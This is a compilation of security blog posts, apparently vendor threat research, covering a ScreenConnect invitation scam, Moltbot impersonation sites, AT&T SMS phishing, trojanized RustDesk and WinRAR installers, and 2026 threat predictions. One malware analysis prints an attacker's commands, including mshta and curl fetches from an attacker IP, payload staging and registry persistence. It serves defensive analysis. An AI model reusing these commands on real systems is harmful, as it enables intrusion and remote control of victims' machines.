The after-party: Remote access is established 

Once installed, the ScreenConnect client initiates encrypted outbound connections to ScreenConnect’s relay servers, including a uniquely assigned instance domain.

That connection gives the attacker the same level of access as a remote IT technician, including the ability to: 

• See the victim’s screen in real time
• Control the mouse and keyboard 
• Upload or download files 
• Keep access even after the computer is restarted 

Because ScreenConnect is legitimate software commonly used for remote support, its presence isn’t always obvious. On a personal computer, the first signs are often behavioral, such as unexplained cursor movement, windows opening on their own, or a ScreenConnect process the user doesn’t remember installing. 

Why this scam works 

This campaign is effective because it targets normal, predictable human behavior. From a behavioral security standpoint, it exploits our natural curiosity and appears to be a low risk. 

Most people don’t think of invitations as dangerous. Opening one feels passive, like glancing at a flyer or checking a message, not installing software. 

Even security-aware users are trained to watch out for warnings and pressure. A friendly “you’re invited” message doesn’t trigger those alarms. 

By the time something feels off, the software is already installed. 

Signs your computer may be affected 

Watch for: 

• A download or executed file named RSVPPartyInvitationCard.msi 
• An unexpected installation of ScreenConnect Client 
• A Windows service named ScreenConnect Client with random characters  
• Your computer makes outbound HTTPS connections to ScreenConnect relay domains 
• Your system resolves the invitation-hosting domain used in this campaign, xnyr[.]digital 

How to stay safe  

This campaign is a reminder that modern attacks often don’t break in—they’re invited in. Remote access tools give attackers deep control over a system. Acting quickly can limit the damage.  

For individuals 

If you receive an email like this: 

• Be suspicious of invitations that ask you to download or open software 
• Never run MSI files from unsolicited emails 
• Verify invitations through another channel before opening anything 

If you already clicked or ran the file:  

• Disconnect from the internet immediately 
• Check for ScreenConnect and uninstall it if present 
• Run a full security scan 
• Change important passwords from a clean, unaffected device 

For organisations (especially in the UK) 

• Alert on unauthorized ScreenConnect installations
• Restrict MSI execution where feasible 
• Treat “remote support tools” as high-risk software
• Educate users: invitations don’t come as installers 

This scam works by installing a legitimate remote access tool without clear user intent. That’s exactly the gap Malwarebytes is designed to catch.

Malwarebytes now detects newly installed remote access tools and alerts you when one appears on your system. You’re then given a choice: confirm that the tool is expected and trusted, or remove it if it isn’t.

---

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

After the viral AI assistant Clawdbot was forced to rename to Moltbot due to a trademark dispute, opportunists moved quickly. Within days, typosquat domains and a cloned GitHub repository appeared—impersonating the project’s creator and positioning infrastructure for a potential supply-chain attack.

The code is clean. The infrastructure is not. With the GitHub downloads and star rating rapidly rising, we took a deep dive into how fake domains target viral open source projects.

The background: Why was Clawdbot renamed?

In early 2026, Peter Steinberger’s Clawdbot became one of the fastest-growing open source projects on GitHub. The self-hosted assistant—described as “Claude with hands”—allowed users to control their computer through WhatsApp, Telegram, Discord, and similar platforms.

Anthropic later objected to the name. Steinberger complied and rebranded the project to Moltbot (“molt” being what lobsters do when they shed their shell).

During the rename, both the GitHub organization and X (formerly Twitter) handle were briefly released before being reclaimed. Attackers monitoring the transition grabbed them within seconds.

“Had to rename our accounts for trademark stuff and messed up the GitHub rename and the X rename got snatched by crypto shills.” — Peter Steinberger

That brief gap was enough.

Impersonation infrastructure emerged

While investigating a suspicious repository, I uncovered a coordinated set of assets designed to impersonate Moltbot.

Domains

• moltbot[.]you
• clawbot[.]ai
• clawdbot[.]you

Repository

• github[.]com/gstarwd/clawbot — a cloned repository using a typosquatted variant of the former Clawdbot project name

Website

A polished marketing site featuring:

• professional design closely matching the real project
• SEO optimization and structured metadata
• download buttons, tutorials, and FAQs
• claims of 61,500+ GitHub stars lifted from the real repository

Evidence of impersonation

False attribution: The site’s schema.org metadata falsely claims authorship by Peter Steinberger, linking directly to his real GitHub and X profiles. This is explicit identity misrepresentation.

Misdirection to an unauthorized repository: “View on GitHub” links send users to gstarwd/clawbot, not the official moltbot/moltbot repository.

Stolen credibility:The site prominently advertises tens of thousands of stars that belong to the real project. The clone has virtually none (although at the time of writing, that number is steadily rising).

Mixing legitimate and fraudulent links: Some links point to real assets, such as official documentation or legitimate binaries. Others redirect to impersonation infrastructure. This selective legitimacy defeats casual verification and appears deliberate.

Full SEO optimization: Canonical tags, Open Graph metadata, Twitter cards, and analytics are all present—clearly intended to rank the impersonation site ahead of legitimate project resources.

The ironic security warning: The impersonation site even warns users about scams involving fake cryptocurrency tokens—while itself impersonating the project.

---

Code analysis: Clean by design

I performed a static audit of the gstarwd/clawbot repository:

• no malicious npm scripts
• no credential exfiltration
• no obfuscation or payload staging
• no cryptomining
• no suspicious network activity

The code is functionally identical to the legitimate project, which is not reassuring.

The threat model

The absence of malware is the strategy. Nothing here suggests an opportunistic malware campaign. Instead, the setup points to early preparation for a supply-chain attack.

The likely chain of events:

A user searches for “clawbot GitHub” or “moltbot download” and finds moltbot[.]you or gstarwd/clawbot.

The code looks legitimate and passes a security audit.

The user installs the project and configures it, adding API keys and messaging tokens. Trust is established.

At a later point, a routine update is pulled through npm update or git pull. A malicious payload is delivered into an installation the user already trusts.

An attacker can then harvest:

• Anthropic API keys
• OpenAI API keys
• WhatsApp session credentials
• Telegram bot tokens
• Discord OAuth tokens
• Slack credentials
• Signal identity keys
• full conversation histories
• command execution access on the compromised machine

What’s malicious, and what isn’t

Clearly malicious

• false attribution to a real individual
• misrepresentation of popularity metrics
• deliberate redirection to an unauthorized repository

Deceptive but not yet malware

• typosquat domains
• SEO manipulation
• cloned repositories with clean code

Not present (yet)

• active malware
• data exfiltration
• cryptomining

Clean code today lowers suspicion tomorrow.

A familiar pattern

This follows a well-known pattern in open source supply-chain attacks.

A user searches for a popular project and lands on a convincing-looking site or cloned repository. The code appears legitimate and passes a security audit.

They install the project and configure it, adding API keys or messaging tokens so it can work as intended. Trust is established.

Later, a routine update arrives through a standard npm update or git pull. That update introduces a malicious payload into an installation the user already trusts.

From there, an attacker can harvest credentials, conversation data, and potentially execute commands on the compromised system.

No exploit is required. The entire chain relies on trust rather than technical vulnerabilities.

How to stay safe

Impersonation infrastructure like this is designed to look legitimate long before anything malicious appears. By the time a harmful update arrives—if it arrives at all—the software may already be widely installed and trusted.

That’s why basic source verification still matters, especially when popular projects rename or move quickly.

Advice for users

• Verify GitHub organization ownership
• Bookmark official repositories directly
• Treat renamed projects as higher risk during transitions

Advice for maintainers

• Pre-register likely typosquat domains before public renames
• Coordinate renames and handle changes carefully
• Monitor for cloned repositories and impersonation sites

Pro tip: Malwarebytes customers are protected. Malwarebytes is actively blocking all known indicators of compromise (IOCs) associated with this impersonation infrastructure, preventing users from accessing the fraudulent domains and related assets identified in this investigation.

---

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

A coworker shared this suspicious SMS where AT&T supposedly warns the recipient that their reward points are about to expire.

Phishing attacks are growing increasingly sophisticated, likely with help from AI. They’re getting better at mimicking major brands—not just in look, but in behavior. Recently, we uncovered a well-executed phishing campaign targeting AT&T customers that combines realistic branding, clever social engineering, and layered data theft tactics.

In this post, we’ll walk you through the investigation, screen by screen, explaining how the campaign tricks its victims and where the stolen data ends up.

This is the text message that started the investigation.

“Dear Customer,
Your AT&T account currently holds 11,430 reward points scheduled to expire on January 26, 2026.
Recommended redemption methods:
– AT&T Rewards Center: {Shortened link}
– AT&T Mobile App: Rewards section
AT&T is dedicated to serving you.”

The shortened URL led to https://att.hgfxp[.]cc/pay/, a website designed to look like an AT&T site in name and appearance.

All branding, headers, and menus were copied over, and the page was full of real links out to att.com.

But the “main event” was a special section explaining how to access your AT&T reward points.

After “verifying” their account with a phone number, the victim is shown a dashboard warning that their AT&T points are due to expire in two days. This short window is a common phishing tactic that exploits urgency and FOMO (fear of missing out).

The rewards on offer—such as Amazon gift cards, headphones, smartwatches, and more—are enticing and reinforce the illusion that the victim is dealing with a legitimate loyalty program.

To add even more credibility, after submitting a phone number, the victim gets to see a list of available gifts, followed by a final confirmation prompt.

At that point, the target is prompted to fill out a “Delivery Information” form requesting sensitive personal information, including name, address, phone number, email, and more. This is where the actual data theft takes place.

The form’s visible submission flow is smooth and professional, with real-time validation and error highlighting—just like you’d expect from a top brand. This is deliberate. The attackers use advanced front-end validation code to maximize the quality and completeness of the stolen information.

Behind the slick UI, the form is connected to JavaScript code that, when the victim hits “Continue,” collects everything they’ve entered and transmits it directly to the attackers. In our investigation, we deobfuscated their code and found a large “data” section.

The stolen data gets sent in JSON format via POST to https://att.hgfxp[.]cc/api/open/cvvInterface.

This endpoint is hosted on the attacker’s domain, giving them immediate access to everything the victim submits.

What makes this campaign effective and dangerous

• Sophisticated mimicry: Every page is an accurate clone of att.com, complete with working navigation links and logos.
• Layered social engineering: Victims are lured step by step, each page lowering their guard and increasing trust.
• Quality assurance: Custom JavaScript form validation reduces errors and increases successful data capture.
• Obfuscated code: Malicious scripts are wrapped in obfuscation, slowing analysis and takedown.
• Centralized exfiltration: All harvested data is POSTed directly to the attacker’s command-and-control endpoint.

How to defend yourself

A number of red flags could have alerted the target that this was a phishing attempt:

• The text was sent to 18 recipients at once.
• It used a generic greeting (“Dear Customer”) instead of personal identification.
• The sender’s number was not a recognized AT&T contact.
• The expiration date changed if the victim visited the fake site on a later date.

Beyond avoiding unsolicited links, here are a few ways to stay safe:

• Only access your accounts through official apps or by typing the official website (att.com) directly into your browser.
• Check URLs carefully. Even if a page looks perfect, hover over links and check the address bar for official domains.
• Enable multi-factor authentication for your AT&T and other critical accounts.
• Use an up to date real-time anti-malware solution with a web protection module.

Pro tip: Malwarebytes Scam Guard recognized this text as a scam.

---

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

The 2026 Security Predictions webinar reinforced a simple but uncomfortable truth. The forces shaping cyber risk are not new, but they are converging faster and with greater impact than many organizations are ready for. Geopolitics, insider risk, and threat intelligence have long influenced cyber operations. What has changed is the extent to which they directly affect everyday security decisions.

Geopolitical risk is now an operational concern

Cyber operations have always reflected geopolitical realities. Nation-states have used cyber capabilities for espionage, surveillance, and disruption for decades. Historically, these activities focused on governments, critical infrastructure, or defense sectors.

That line has faded.

Today, private organizations are increasingly targeted as proxies. Supply chains, cloud providers, and SaaS platforms offer scale, access, and plausible deniability for state-aligned groups. Many of these campaigns are not designed for immediate disruption. Instead, they focus on intelligence gathering, long-term access, or positioning that can be activated later.

For security teams, this shift creates a new challenge. Geopolitical motivation does not follow traditional cybercrime logic. Organizations that do not consider themselves high risk can still become collateral targets because of who they work with, where they operate, or what services they provide.

Geopolitical awareness can no longer sit outside the SOC. It must influence monitoring priorities, threat modeling, and response readiness.

Looking ahead: Action plan for 2026

Security teams should track geopolitical developments and understand how global events influence attacker behavior. Curated threat intelligence helps translate abstract risk into concrete tools, infrastructure, and techniques that defenders can monitor.

Incident response playbooks should also account for politically motivated attacks. These scenarios benefit from executive pre-approval, allowing teams to respond decisively when intent is unclear but potential impact is high.

Finally, organizations should map exposure across suppliers, technology partners, and infrastructure dependencies. Understanding where geopolitical risk intersects with your environment is now essential for resilience.

Insider threats are becoming a primary breach driver

Insider threats are not a new problem, but their role in breaches continues to grow. Within the 2026 Security Predictions webinar, the panel emphasized that insider risk now spans a wide spectrum. At one end is simple negligence, including phishing mistakes, misconfigurations, and poor access hygiene. At the other is deliberate access monetization, where credentials or privileged access are sold or misused.

Several factors are accelerating this trend. Workforce stress, economic pressure, role churn, and identity sprawl all increase the likelihood that access will be abused or misused. In many cases, breaches now begin with valid credentials, making traditional perimeter defenses less effective.

This reality forces a shift in how security teams think about trust and access. Valid access no longer means safe access.

Looking ahead: Action plan for 2026

Security teams should establish behavior baselines across users and roles to identify anomalous activity early. Unexpected access patterns, unusual downloads, or irregular logins often provide the first signal that something is wrong.

Just as important is fostering a speak-up culture. Employees should be encouraged to report phishing attempts, mistakes, or suspicious behavior without fear. Early reporting often determines whether an incident is contained quickly or escalates.

Privilege models also require regular review. Least privilege must be continuous, not static. As roles evolve and environments change, access should be reassessed to reduce blast radius when incidents occur.

Context is becoming the decisive advantage

Threat intelligence and detection capabilities have advanced rapidly, but volume alone does not improve outcomes. Security teams now face more alerts, more telemetry, and more data than ever before. The challenge is deciding what matters.

The panel highlighted that speed without context creates noise, not security. As exploitation windows shrink and attacks scale, teams that lack context struggle to prioritize, investigate, and respond effectively.

Context brings together asset criticality, exposure, threat intelligence, and business impact. Teams that operate with this understanding move faster because they know where to focus and why.

This shift also changes how security leaders communicate value. Metrics tied to readiness, risk reduction, and response effectiveness resonate far more than raw alert counts.

Looking ahead: Action plan for 2026

Security leaders should align SecOps and executive stakeholders around shared dashboards and context-rich briefings. These views should emphasize readiness gaps, exposure trends, and investment value, rather than activity volume.

Organizations should also rationalize security tooling around outcomes. High-impact tools that improve time to detect, time to respond, and analyst efficiency matter more than broad coverage alone.

Finally, teams should reinvest saved time and budget into areas that compound over time. Automation, threat intelligence, and staff development all strengthen resilience when supported consistently.

Preparing for what comes next

The webinar made it clear that success in 2026 will depend on integration, awareness, and context. Geopolitical risk, insider threats, and intelligence-driven defense are no longer separate concerns. They intersect daily inside modern security operations.

Teams that acknowledge this reality and act early will be better positioned to respond with confidence, adapt to change, and stay ahead of increasingly sophisticated attackers.

Missed the live session? Watch the 2026 Security Predictions webinar to understand the forces shaping cyber risk and what to prioritize next.

Recently, our team came across an infection attempt that stood out—not for its sophistication, but for how determined the attacker was to take a “living off the land” approach to the extreme.

The end goal was to deploy Remcos, a Remote Access Trojan (RAT), and NetSupport Manager, a legitimate remote administration tool that’s frequently abused as a RAT. The route the attacker took was a veritable tour of Windows’ built-in utilities—known as LOLBins (Living Off the Land Binaries).

Both Remcos and NetSupport are widely abused remote access tools that give attackers extensive control over infected systems and are often delivered through multi-stage phishing or infection chains.

Remcos (short for Remote Control & Surveillance) is sold as a legitimate Windows remote administration and monitoring tool but is widely used by cybercriminals. Once installed, it gives attackers full remote desktop access, file system control, command execution, keylogging, clipboard monitoring, persistence options, and tunneling or proxying features for lateral movement.

NetSupport Manager is a legitimate remote support product that becomes “NetSupport RAT” when attackers silently install and configure it for unauthorized access.

Let’s walk through how this attack unfolded, one native command at a time.

Stage 1: The subtle initial access

The attack kicked off with a seemingly odd command:

C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m notepad.exe /c "cmd /c start mshta http://[attacker-ip]/web"

At first glance, you might wonder: why not just run mshta.exe directly? The answer lies in defense evasion.

By roping in forfiles.exe, a legitimate tool for running commands over batches of files, the attacker muddied the waters. This makes the execution path a bit harder for security tools to spot. In essence, one trusted program quietly launches another, forming a chain that’s less likely to trip alarms.

Stage 2: Fileless download and staging

The mshta command fetched a remote HTA file that immediately spawned cmd.exe, which rolled out an elaborate PowerShell one-liner:

powershell.exe -NoProfile -Command

curl -s -L -o "<random>.pdf" (attacker-ip}/socket;

mkdir "<random>";

tar -xf "<random>.pdf" -C "<random>";

Invoke-CimMethod Win32_Process Create "<random>\glaxnimate.exe"

Here’s what that does:

PowerShell’s built-in curl downloaded a payload disguised as a PDF, which in reality was a TAR archive. Then, tar.exe (another trusted Windows add-on) unpacked it into a randomly named folder. The star of this show, however, was glaxnimate.exe—a trojanized version of real animation software, primed to further the infection on execution. Even here, the attacker relies entirely on Windows’ own tools—no EXE droppers or macros in sight.

Stage 3: Staging in plain sight

What happened next? The malicious Glaxnimate copy began writing partial files to C:\ProgramData:

• SETUP.CAB.PART
• PROCESSOR.VBS.PART
• PATCHER.BAT.PART

Why .PART files? It’s classic malware staging. Drop files in a half-finished state until the time is right—or perhaps until the download is complete. Once the coast is clear, rename or complete the files, then use them to push the next payloads forward.

Stage 4: Scripting the launch

Malware loves a good script—especially one that no one sees. Once fully written, Windows Script Host was invoked to execute the VBScript component:

"C:\Windows\System32\WScript.exe" "C:\ProgramData\processor.vbs"

The VBScript used IWshShell3.Run to silently spawn cmd.exe with a hidden window so the victim would never see a pop-up or black box.

IWshShell3.Run("cmd.exe /c %ProgramData%\patcher.bat", "0", "false");

The batch file’s job?

expand setup.cab -F:* C:\ProgramData

Use the expand utility to extract all the contents of the previously dropped setup.cab archive into ProgramData—effectively unpacking the NetSupport RAT and its helpers.

Stage 5: Hidden persistence

To make sure their tool survived a restart, the attackers opted for the stealthy registry route:

reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\PATCHDIRSEC\client32.exe" /f

Unlike old-school Run keys, UserInitMprLogonScript isn’t a usual suspect and doesn’t open visible windows. Every time the user logged in, the RAT came quietly along for the ride.

Final thoughts

This infection chain is a masterclass in LOLBin abuse and proof that attackers love turning Windows’ own tools against its users. Every step of the way relies on built-in Windows tools: forfiles, mshta, curl, tar, scripting engines, reg, and expand.

So, can you use too many LOLBins to drop a RAT? As this attacker shows, the answer is “not yet.” But each additional step adds noise, and leaves more breadcrumbs for defenders to follow. The more tools a threat actor abuses, the more unique their fingerprints become.

Stay vigilant. Monitor potential LOLBin abuse. And never trust a .pdf that needs tar.exe to open.

Despite the heavy use of LOLBins, Malwarebytes still detects and blocks this attack. It blocked the attacker’s IP address and detected both the Remcos RAT and the NetSupport client once dropped on the system.

---

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

It starts with a simple search.

You need to set up remote access to a colleague’s computer. You do a Google search for “RustDesk download,” click one of the top results, and land on a polished website with documentation, downloads, and familiar branding.

You install the software, launch it, and everything works exactly as expected.

What you don’t see is the second program that installs alongside it—one that quietly gives attackers persistent access to your computer.

That’s exactly what we observed in a campaign using the fake domain rustdesk[.]work.

The bait: a near-perfect impersonation

We identified a malicious website at rustdesk[.]work impersonating the legitimate RustDesk project, which is hosted at rustdesk.com. The fake site closely mirrors the real one, complete with multilingual content and prominent warnings claiming (ironically) that rustdesk[.]work is the only official domain.

This campaign doesn’t exploit software vulnerabilities or rely on advanced hacking techniques. It succeeds entirely through deception. When a website looks legitimate and the software behaves normally, most users never suspect anything is wrong.

What happens when you run the installer

The installer performs a deliberate bait-and-switch:

1. It installs real RustDesk, fully functional and unmodified
2. It quietly installs a hidden backdoor, a malware framework known as Winos4.0

The user sees RustDesk launch normally. Everything appears to work. Meanwhile, the backdoor quietly establishes a connection to the attacker’s server.

By bundling malware with working software, attackers remove the most obvious red flag: broken or missing functionality. From the user’s point of view, nothing feels wrong.

Inside the infection chain

The malware executes through a staged process, with each step designed to evade detection and establish persistence:

Stage 1: The trojanized installer

The downloaded file (rustdesk-1.4.4-x86_64.exe) acts as both dropper and decoy. It writes two files to disk:

• The legitimate RustDesk installer, which is executed to maintain cover
• logger.exe, the Winos4.0 payload

The malware hides in plain sight. While the user watches RustDesk install normally, the malicious payload is quietly staged in the background.

Stage 2: Loader execution

The logger.exe file is a loader — its job is to set up the environment for the main implant. During execution, it:

• Creates a new process
• Allocates executable memory
• Transitions execution to a new runtime identity: Libserver.exe

This loader-to-implant handoff is a common technique in sophisticated malware to separate the initial dropper from the persistent backdoor.

By changing its process name, the malware makes forensic analysis harder. Defenders looking for “logger.exe” won’t find a running process with that name.

Stage 3: In-memory module deployment

The Libserver.exe process unpacks the actual Winos4.0 framework entirely in memory. Several WinosStager DLL modules—and a large ~128 MB payload—are loaded without being written to disk as standalone files.

Traditional antivirus tools focus on scanning files on disk (file-based detection). By keeping its functional components in memory only, the malware significantly reduces the effectiveness of file-based detection. This is why behavioral analysis and memory scanning are critical for detecting threats like Winos4.0.

The hidden payload: Winos4.0

The secondary payload is identified as Winos4.0 (WinosStager): a sophisticated remote access framework that has been observed in multiple campaigns, particularly targeting users in Asia.

Once active, it allows attackers to:

• Monitor victim activity and capture screenshots
• Log keystrokes and steal credentials
• Download and execute additional malware
• Maintain persistent access even after system reboots

This isn’t simple malware—it’s a full-featured attack framework. Once installed, attackers have a foothold they can use to conduct espionage, steal data, or deploy ransomware at a time of their choosing.

Technical detail: How the malware hides

The malware employs several techniques to avoid detection:

What it does	How it achieves this	Why it matters
Runs entirely in memory	Loads executable code without writing files	Evades file-based detection
Detects analysis environments	Checks available system memory and looks for debugging tools	Prevents security researchers from analyzing its behavior
Checks system language	Queries locale settings via the Windows registry	May be used to target (or avoid) specific geographic regions
Clears browser history	Invokes system APIs to delete browsing data	Removes evidence of how the victim found the malicious site
Hides configuration in the registry	Stores encrypted data in unusual registry paths	Hides configuration from casual inspection

Command-and-control activity

Shortly after installation, the malware connects to an attacker-controlled server:

• IP: 207.56.13[.]76
• Port: 5666/TCP

This connection allows attackers to send commands to the infected machine and receive stolen data in return. Network analysis confirmed sustained two-way communication consistent with an established command-and-control session.

How the malware blends into normal traffic

The malware is particularly clever in how it disguises its network activity:

Destination	Purpose
207.56.13[.]76:5666	Malicious: Command-and-control server
209.250.254.15:21115-21116	Legitimate: RustDesk relay traffic
api.rustdesk.com:443	Legitimate: RustDesk API

Because the victim installed real RustDesk, the malware’s network traffic is mixed with legitimate remote desktop traffic. This makes it much harder for network security tools to identify the malicious connections: the infected computer looks like it’s just running RustDesk.

What this campaign reveals

This attack demonstrates a troubling trend: legitimate software used as camouflage for malware.

The attackers didn’t need to find a zero-day vulnerability or craft a sophisticated exploit. They simply:

1. Registered a convincing domain name
2. Cloned a legitimate website
3. Bundled real software with their malware
4. Let the victim do the rest

This approach works because it exploits human trust rather than technical weaknesses. When software behaves exactly as expected, users have no reason to suspect compromise.

Indicators of compromise

File hashes (SHA256)

File	SHA256	Classification
Trojanized installer	330016ab17f2b03c7bc0e10482f7cb70d44a46f03ea327cd6dfe50f772e6af30	Malicious
logger.exe / Libserver.exe	5d308205e3817adcfdda849ec669fa75970ba8ffc7ca643bf44aa55c2085cb86	Winos4.0 loader
RustDesk binary	c612fd5a91b2d83dd9761f1979543ce05f6fa1941de3e00e40f6c7cdb3d4a6a0	Legitimate

Network indicators

Malicious domain: rustdesk[.]work

C2 server: 207.56.13[.]76:5666/TCP

In-memory payloads

During execution, the malware unpacks several additional components directly into memory:

SHA256	Size	Type
a71bb5cf751d7df158567d7d44356a9c66b684f2f9c788ed32dadcdefd9c917a	107 KB	WinosStager DLL
900161e74c4dbab37328ca380edb651dc3e120cfca6168d38f5f53adffd469f6	351 KB	WinosStager DLL
770261423c9b0e913cb08e5f903b360c6c8fd6d70afdf911066bc8da67174e43	362 KB	WinosStager DLL
1354bd633b0f73229f8f8e33d67bab909fc919072c8b6d46eee74dc2d637fd31	104 KB	WinosStager DLL
412b10c7bb86adaacc46fe567aede149d7c835ebd3bcab2ed4a160901db622c7	~128 MB	In-memory payload
00781822b3d3798bcbec378dfbd22dc304b6099484839fe9a193ab2ed8852292	307 KB	In-memory payload

How to protect yourself

The rustdesk[.]work campaign shows how attackers can gain access without exploits, warnings, or broken software. By hiding behind trusted open-source tools, this attack achieved persistence and cover while giving victims no reason to suspect compromise.

The takeaway is simple: software behaving normally does not mean it’s safe. Modern threats are designed to blend in, making layered defenses and behavioral detection essential.

For individuals:

• Always verify download sources. Before downloading software, check that the domain matches the official project. For RustDesk, the legitimate site is rustdesk.com—not rustdesk.work or similar variants.
• Be suspicious of search results. Attackers use SEO poisoning to push malicious sites to the top of search results. When possible, navigate directly to official websites rather than clicking search links.
• Use security software. Malwarebytes Premium Security detects malware families like Winos4.0, even when bundled with legitimate software.

For businesses:

• Monitor for unusual network connections. Outbound traffic on port 5666/TCP, or connections to unfamiliar IP addresses from systems running remote desktop software, should be investigated.
• Implement application allowlisting. Restrict which applications can run in your environment to prevent unauthorized software execution.
• Educate users about typosquatting. Training programs should include examples of fake websites and how to verify legitimate download sources.
• Block known malicious infrastructure. Add the IOCs listed above to your security tools.

---

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

A member of our web research team pointed me to a fake WinRAR installer that was linked from various Chinese websites. When these links start to show up, that’s usually a good indicator of a new campaign.

So, I downloaded the file and started an analysis, which turned out to be something of a Matryoshka doll. Layer after layer, after layer.

WinRAR is a popular utility that’s often downloaded from “unofficial” sites, which gives campaigns offering fake downloads a bigger chance of being effective.

Often, these payloads contain self-extracting or multi-stage components that can download further malware, establish persistence, exfiltrate data, or open backdoors, all depending on an initial system analysis. So it was no surprise that one of the first actions this malware took was to access sensitive Windows data in the form of Windows Profiles information.

This, along with other findings from our analysis (see below), indicates that the file selects the “best-fit” malware for the affected system before further compromising or infecting it.

How to stay safe

Mistakes are easily made when you’re looking for software to solve a problem, especially when you want that solution fast. A few simple tips can help keep you safe in situations like this.

• Only download software from official and trusted sources. Avoid clicking links that promise to deliver that software on social media, in emails, or on other unfamiliar websites.
• Use a real-time, up-to-date anti-malware solution to block threats before they can run.

Analysis

The original file was called winrar-x64-713scp.zip and the initial analysis with Detect It Easy (DIE) already hinted at several layers.

Unzipping the file produced winrar-x64-713scp.exe which turned out to be a UPX packed file that required the --force option to unpack it due to deliberate PE anomalies. UPX normally aborts compression if it finds unexpected values or unknown data in the executable header fields, as that data may be required for the program to run correctly. The --force option tells UPX to ignore these anomalies and proceed with decompression anyway.

Looking at the unpacked file, DIE showed yet another layer: (Heur)Packer: Compressed or packed data[SFX]. Looking at the strings inside the file I noticed two RunProgram instances:

RunProgram="nowait:\"1winrar-x64-713scp1.exe\" "

RunProgram="nowait:\"youhua163

These commands tell the SFX archive to run the embedded programs immediately after extraction, without waiting for it to complete (nowait).

Using PeaZip, I extracted both embedded files.

The Chinese characters “安装” complicated the string analysis, but they translate as “install,” which further piqued my interest. The file 1winrar-x64-713scp1.exe turned out to be the actual WinRAR installer, likely included to ease suspicion for anyone running the malware.

After removing another layer, the other file turned out to be a password-protected zip file named setup.hta. The obfuscation used here led me to switch to dynamic analysis. Running the file on a virtual machine showed that setup.hta is unpacked at runtime directly into memory. The memory dump revealed another interesting string: nimasila360.exe.

This is a known file often created by fake installers and associated with the Winzipper malware. Winzipper is a known Chinese-language malicious program that pretends to be a harmless file archive so it can sneak onto a victim’s computer, often through links or attachments. Once opened and installed, it quietly deploys a hidden backdoor that lets attackers remotely control the machine, steal data, and install additional malware, all while the victim believes they’ve simply installed legitimate software.

Indicators of Compromise (IOCs)

Domains:

winrar-tw[.]com

winrar-x64[.]com

winrar-zip[.]com

Filenames:

winrar-x64-713scp.zip

youhua163安装.exe

setup.hta (dropped in C:\Users\{username}\AppData\Local\Temp)

Malwarebytes’ web protection component blocks all domains hosting the malicious file and installer.

As the threat landscape keeps shifting, security teams are being asked to do more than react. They are expected to look ahead, connect the dots, and make decisions in environments that change faster every year. That challenge was at the heart of Rapid7’s 2026 Security Predictions webinar, where our experts reflected on what the past year revealed about attacker behavior, defender priorities, and the realities of running a modern SOC.

The conversation looked back just long enough to spot the patterns that matter, then turned forward to the forces shaping 2026. Geopolitics, insider risk, and the need for context-driven defense all surfaced repeatedly. The takeaway was simple but important. Attackers are adapting quickly, and security teams need to adapt with the same urgency.

Below are the key takeaways from the discussion, along with the top predictions shaping the year ahead.

Key takeaways from the discussion

The threat landscape is no longer isolated

One of the strongest themes from the webinar was how interconnected today’s risks have become. Cyber activity does not exist in a vacuum. Geopolitical tensions, economic pressure, workforce challenges, and technological acceleration all feed directly into attacker behavior.

Security teams can no longer separate cyber risk from broader business and global risk. Decisions made outside the SOC, from supplier choices to workforce strategy, increasingly influence exposure and attack paths.

Identity and access remain the most reliable attack paths

Despite continued investment in perimeter defenses, attackers are still finding success through compromised credentials, misused access, and human error. The webinar panel reinforced that identity-based compromise remains one of the most consistent and scalable techniques used by threat actors.

This means defenders must treat identity, behavior, and access governance as core detection and response signals, not secondary controls.

Speed without context creates noise, not security

The rise of AI-driven attacks and automation has increased the volume and pace of activity security teams must process. However, the panel stressed that faster alerts alone do not improve outcomes.

Without understanding which assets matter, which exposures are exploitable, and which alerts represent real risk, teams risk moving quickly in the wrong direction. Context is now essential for effective prioritization and response.

The top cybersecurity predictions for 2026

1. Geopolitical fault lines will redraw the cyber battlefield

In 2026, geopolitical tensions will continue to spill into the digital domain, with private organizations increasingly caught in the middle. State-aligned and state-tolerated groups will target critical supply chains, service providers, and global enterprises as proxy targets, blending espionage with economic disruption.

For security teams, this means geopolitical risk must be factored into threat modeling, vendor assessments, and incident response planning. Even organizations far from traditional conflict zones may find themselves impacted by campaigns tied to global tensions.

2. Insider threats will dominate breach root causes

The panel highlighted that many of tomorrow’s breaches will not start with attackers breaking in, but with access already in place. Insider threats, driven by simple negligence, compromised credentials, or monetized access selling, will continue to rise.

Economic stress, workforce changes, and growing access complexity all contribute to this trend. As a result, organizations must focus more on access hygiene, behavior monitoring, and creating environments where employees can report mistakes early without fear.

3. Context will become the new currency of cyber performance

As attacks scale and exploitation windows shrink, the ability to understand what matters most will define successful security operations. The panel emphasized that visibility alone is no longer enough.

Security teams that integrate exposure management, detection, and response will outperform those relying on disconnected tools and alert-heavy workflows. Context-rich defense allows teams to triage faster, investigate smarter, and respond based on real business risk rather than alert volume.

What this means for security teams heading into 2026

The predictions shared during the webinar point to a future where success depends less on adding more tools and more on using intelligence, context, and automation effectively. Security teams that can unify visibility, prioritize risk, and act decisively will be better positioned to keep pace with increasingly adaptive attackers.

The message from the panel was clear. 2026 will reward teams that focus on understanding their environment, aligning security efforts with real-world risk, and preparing for threats shaped by forces far beyond the SOC.

Watch the 2026 Security Predictions webinar to hear directly from Rapid7’s experts on what’s shaping the threat landscape and how security teams should prepare.

A PDF named “NEW Purchase Order # 52177236.pdf” turned out to be a phishing lure. So we analyzed the phishing script behind it.

A customer contacted me when Malwarebytes blocked the link inside a “purchase order” email they had received.

When I examined the attachment, it soon became clear why we blocked it.

The visible content of the PDF showed a button prompting the recipient to view the purchase order. Hovering over the button revealed a long URL that included a reference to a PDF viewer. While this might fool some people at first glance, a closer look raised red flags:

